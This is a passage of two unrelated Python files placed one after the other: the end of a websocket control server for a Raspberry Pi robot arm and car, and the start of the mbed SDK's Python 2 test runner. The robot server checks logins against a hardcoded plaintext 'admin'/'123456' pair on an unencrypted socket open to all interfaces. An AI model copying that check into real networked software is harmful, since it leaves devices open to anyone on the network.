flask_app.modeselect('findColor')
elif 'motionGet' == command_input:
if OLED_connection:
screen.screen_show(5,'MotionGet')
flask_app.modeselect('watchDog')
elif 'stopCV' == command_input:
flask_app.modeselect('none')
switch.switch(1,0)
switch.switch(2,0)
switch.switch(3,0)
elif 'police' == command_input:
if OLED_connection:
screen.screen_show(5,'POLICE')
RL.police()
elif 'policeOff' == command_input:
RL.pause()
move.motorStop()
elif 'automatic' == command_input:
if OLED_connection:
screen.screen_show(5,'Automatic')
if modeSelect == 'PT':
fuc.automatic()
else:
fuc.pause()
elif 'automaticOff' == command_input:
fuc.pause()
move.motorStop()
elif 'trackLine' == command_input:
fuc.trackLine()
if OLED_connection:
screen.screen_show(5,'TrackLine')
elif 'trackLineOff' == command_input:
fuc.pause()
move.motorStop()
elif 'steadyCamera' == command_input:
if OLED_connection:
screen.screen_show(5,'SteadyCamera')
fuc.steady(T_sc.lastPos[2])
elif 'steadyCameraOff' == command_input:
fuc.pause()
move.motorStop()
def switchCtrl(command_input, response):
if 'Switch_1_on' in command_input:
switch.switch(1,1)
elif 'Switch_1_off' in command_input:
switch.switch(1,0)
elif 'Switch_2_on' in command_input:
switch.switch(2,1)
elif 'Switch_2_off' in command_input:
switch.switch(2,0)
elif 'Switch_3_on' in command_input:
switch.switch(3,1)
elif 'Switch_3_off' in command_input:
switch.switch(3,0)
def robotCtrl(command_input, response):
global direction_command, turn_command
if 'forward' == command_input:
direction_command = 'forward'
move.move(speed_set, 'forward', 'no', rad)
elif 'backward' == command_input:
direction_command = 'backward'
move.move(speed_set, 'backward', 'no', rad)
elif 'DS' in command_input:
direction_command = 'no'
if turn_command == 'no':
move.move(speed_set, 'no', 'no', rad)
elif 'left' == command_input:
turn_command = 'left'
move.move(speed_set, 'no', 'left', rad)
elif 'right' == command_input:
turn_command = 'right'
move.move(speed_set, 'no', 'right', rad)
elif 'TS' in command_input:
turn_command = 'no'
if direction_command == 'no':
move.move(speed_set, 'no', 'no', rad)
else:
move.move(speed_set, direction_command, 'no', rad)
elif 'lookleft' == command_input:
P_sc.singleServo(14, -1, 3)
elif 'lookright' == command_input:
P_sc.singleServo(14, 1, 3)
elif 'LRstop' in command_input:
P_sc.stopWiggle()
elif 'up' == command_input:
T_sc.singleServo(11, -1, 3)
elif 'down' == command_input:
T_sc.singleServo(11, 1, 3)
elif 'UDstop' in command_input:
T_sc.stopWiggle()
elif 'handup' == command_input:
# H1_sc.singleServo(12, 1, 7)
H2_sc.singleServo(13, -1, 7)
elif 'handdown' == command_input:
# H1_sc.singleServo(12, -1, 7)
H2_sc.singleServo(13, 1, 7)
elif 'HAstop' in command_input:
# H1_sc.stopWiggle()
H2_sc.stopWiggle()
elif 'armup' == command_input:
H1_sc.singleServo(12, 1, 7)
# H2_sc.singleServo(13, 1, 7)
elif 'armdown' == command_input:
H1_sc.singleServo(12, -1, 7)
# H2_sc.singleServo(13, -1, 7)
elif 'Armstop' in command_input:
H1_sc.stopWiggle()
# H2_sc.stopWiggle()
elif 'grab' == command_input:
G_sc.singleServo(15, 1, 3)
elif 'loose' == command_input:
G_sc.singleServo(15, -1, 3)
elif 'stop' == command_input:
G_sc.stopWiggle()
elif 'home' == command_input:
P_sc.moveServoInit([11])
T_sc.moveServoInit([14])
H1_sc.moveServoInit([12])
H2_sc.moveServoInit([13])
G_sc.moveServoInit([15])
def configPWM(command_input, response):
global init_pwm0, init_pwm1, init_pwm2, init_pwm3, init_pwm4
if 'SiLeft' == command_input:
init_pwm0 += 1
scGear.setPWM(0,init_pwm0)
elif 'SiRight' == command_input:
init_pwm0 -= 1
scGear.setPWM(0,-init_pwm0)
elif 'PWM0MS' == command_input:
scGear.initConfig(0,init_pwm0,1)
replace_num('init_pwm0 = ', init_pwm0)
elif 'PWM1MS' == command_input:
init_pwm1 = P_sc.lastPos[1]
P_sc.initConfig(1,P_sc.lastPos[1],1)
replace_num('init_pwm1 = ', P_sc.lastPos[1])
elif 'PWM2MS' == command_input:
init_pwm2 = T_sc.lastPos[2]
T_sc.initConfig(2,T_sc.lastPos[2],1)
print('LLLLLS',T_sc.lastPos[2])
replace_num('init_pwm2 = ', T_sc.lastPos[2])
elif 'PWM3MS' == command_input:
init_pwm3 = H_sc.lastPos[3]
H_sc.initConfig(3,H_sc.lastPos[3],1)
replace_num('init_pwm3 = ', H_sc.lastPos[3])
elif 'PWM4MS' == command_input:
init_pwm4 = G_sc.lastPos[4]
G_sc.initConfig(4,G_sc.lastPos[4],1)
replace_num('init_pwm4 = ', G_sc.lastPos[4])
elif 'PWMINIT' == command_input:
print(init_pwm1)
servoPosInit()
elif 'PWMD' == command_input:
init_pwm0,init_pwm1,init_pwm2,init_pwm3,init_pwm4=300,300,300,300,300
scGear.initConfig(0,init_pwm0,1)
replace_num('init_pwm0 = ', 300)
P_sc.initConfig(1,300,1)
replace_num('init_pwm1 = ', 300)
T_sc.initConfig(2,300,1)
replace_num('init_pwm2 = ', 300)
H_sc.initConfig(3,300,1)
replace_num('init_pwm3 = ', 300)
G_sc.initConfig(4,300,1)
replace_num('init_pwm4 = ', 300)
'''
def update_code():
# Update local to be consistent with remote
projectPath = thisPath[:-7]
with open(f'{projectPath}/config.json', 'r') as f1:
config = json.load(f1)
if not config['production']:
print('Update code')
# Force overwriting local code
if os.system(f'cd {projectPath} && sudo git fetch --all && sudo git reset --hard origin/master && sudo git pull') == 0:
print('Update successfully')
print('Restarting...')
os.system('sudo reboot')
'''
def wifi_check():
try:
s =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("1.1.1.1",80))
ipaddr_check=s.getsockname()[0]
s.close()
print(ipaddr_check)
# update_code()
if OLED_connection:
screen.screen_show(2, 'IP:'+ipaddr_check)
screen.screen_show(3, 'AP MODE OFF')
except:
ap_threading=threading.Thread(target=ap_thread) #Define a thread for data receiving
ap_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ap_threading.start() #Thread starts
if OLED_connection:
screen.screen_show(2, 'AP Starting 10%')
RL.setColor(0,16,50)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 30%')
RL.setColor(0,16,100)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 50%')
RL.setColor(0,16,150)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 70%')
RL.setColor(0,16,200)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 90%')
RL.setColor(0,16,255)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 100%')
RL.setColor(35,255,35)
if OLED_connection:
screen.screen_show(2, 'IP:192.168.12.1')
screen.screen_show(3, 'AP MODE ON')
async def check_permit(websocket):
while True:
recv_str = await websocket.recv()
cred_dict = recv_str.split(":")
if cred_dict[0] == "admin" and cred_dict[1] == "123456":
response_str = "congratulation, you have connect with server\r\nnow, you can do something else"
await websocket.send(response_str)
return True
else:
response_str = "sorry, the username or password is wrong, please submit again"
await websocket.send(response_str)
async def recv_msg(websocket):
global speed_set, modeSelect
move.setup()
direction_command = 'no'
turn_command = 'no'
while True:
response = {
'status' : 'ok',
'title' : '',
'data' : None
}
data = ''
data = await websocket.recv()
try:
data = json.loads(data)
except Exception as e:
print('not A JSON')
if not data:
continue
if isinstance(data,str):
robotCtrl(data, response)
switchCtrl(data, response)
functionSelect(data, response)
configPWM(data, response)
if 'get_info' == data:
response['title'] = 'get_info'
response['data'] = [info.get_cpu_tempfunc(), info.get_cpu_use(), info.get_ram_info()]
if 'wsB' in data:
try:
set_B=data.split()
speed_set = int(set_B[1])
except:
pass
elif 'AR' == data:
modeSelect = 'AR'
screen.screen_show(4, 'ARM MODE ON')
try:
fpv.changeMode('ARM MODE ON')
except:
pass
elif 'PT' == data:
modeSelect = 'PT'
screen.screen_show(4, 'PT MODE ON')
try:
fpv.changeMode('PT MODE ON')
except:
pass
#CVFL
elif 'CVFL' == data:
flask_app.modeselect('findlineCV')
elif 'CVFLColorSet' in data:
color = int(data.split()[1])
flask_app.camera.colorSet(color)
elif 'CVFLL1' in data:
pos = int(data.split()[1])
flask_app.camera.linePosSet_1(pos)
elif 'CVFLL2' in data:
pos = int(data.split()[1])
flask_app.camera.linePosSet_2(pos)
elif 'CVFLSP' in data:
err = int(data.split()[1])
flask_app.camera.errorSet(err)
elif 'defEC' in data:#Z
fpv.defaultExpCom()
elif(isinstance(data,dict)):
if data['title'] == "findColorSet":
color = data['data']
flask_app.colorFindSet(color[0],color[1],color[2])
if not functionMode:
if OLED_connection:
screen.screen_show(5,'Functions OFF')
else:
pass
print(data)
response = json.dumps(response)
await websocket.send(response)
async def main_logic(websocket, path):
await check_permit(websocket)
await recv_msg(websocket)
if __name__ == '__main__':
switch.switchSetup()
switch.set_all_switch_off()
HOST = ''
PORT = 10223 #Define port serial
BUFSIZ = 1024 #Define buffer size
ADDR = (HOST, PORT)
global flask_app
flask_app = app.webapp()
flask_app.startthread()
try:
RL=robotLight.RobotLight()
RL.start()
RL.breath(70,70,255)
except ModuleNotFoundError as e:
print('Use "sudo pip3 install rpi_ws281x" to install WS_281x package\n使用"sudo pip3 install rpi_ws281x"命令来安装rpi_ws281x')
pass
while 1:
wifi_check()
try: #Start server,waiting for client
start_server = websockets.serve(main_logic, '0.0.0.0', 8888)
asyncio.get_event_loop().run_until_complete(start_server)
print('waiting for connection...')
# print('...connected from :', addr)
break
except Exception as e:
print(e)
RL.setColor(0,0,0)
try:
RL.setColor(0,80,255)
except:
pass
try:
asyncio.get_event_loop().run_forever()
except Exception as e:
print(e)
RL.setColor(0,0,0)
move.destroy()
|
test_api.py | """
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from copy import copy
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename, relpath
from threading import Thread, Lock
from multiprocessing import Pool, cpu_count
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.memap import MemapParser
from tools.targets import TARGET_MAP
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import prepare_toolchain
from tools.build_api import scan_resources
from tools.build_api import get_config
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.options import extract_profile
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
from tools.utils import get_path_depth
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_parser=None,
_opts=None,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_report_text_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_report_text_file_name = _opts_report_text_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_parser = _parser
self.opts = _opts
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
profile = extract_profile(self.opts_parser, self.opts, toolchain)
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed f applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
build_profile=profile)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
project_id=test_id,
project_description=test.get_description(),
build_profile=profile)
except Exception, e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print self.logger.log_line(self.logger.LogType.INFO, 'The project %s is not supported'% (project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id, test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDL, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].iteritems():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].iteritems():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names:
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names]):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Non automated test skipped for target %s'% (target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
